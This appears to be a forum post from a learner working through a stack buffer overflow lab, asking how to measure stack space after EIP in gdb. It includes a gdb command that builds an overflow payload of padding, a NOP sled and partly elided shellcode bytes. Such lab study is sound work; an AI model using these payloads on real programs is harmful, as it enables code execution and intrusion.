Hello everyone, I find a bit of confussion in resolving that question.
I recon I must return the size between the EIP address and the last address of the stack (0xffffffff).
I understand and i think I get the basics of the stack, if someone could please point me out if I am wrong or where I am failing in some assumptions, I expose myself:
1- I generate the shellcode as following in the tutorial.
2- i execute the python instruction in order to adjust the exploit size.
My command is " run $(python -c βprint β\x55β * (1040 - 124 - 95 - 4) + β\x90β * 124 + β\xda\xca\xba\xe4β¦[β¦]β¦\xad\xec\xa0\x04\x5a\x22\xa2β + β\x66β * 4β)".
3- then i examine the stack, with itβs registers and itβs addresses, and I try to subtract the EIP address of the bowfunc (the current frame) minus the last address of the stack (0xffffffff).
4- there are 2 stack frames ( you can see this with the gdb βbtβ command). And I have tried substracting both EIP registers with the last address of the stack (0xfffffffff). But I got no luck.
Am I calculating the space in a wrong way? Is this way of gathering this size of the stack space after the EIP okay?
Thanks a lot in advance,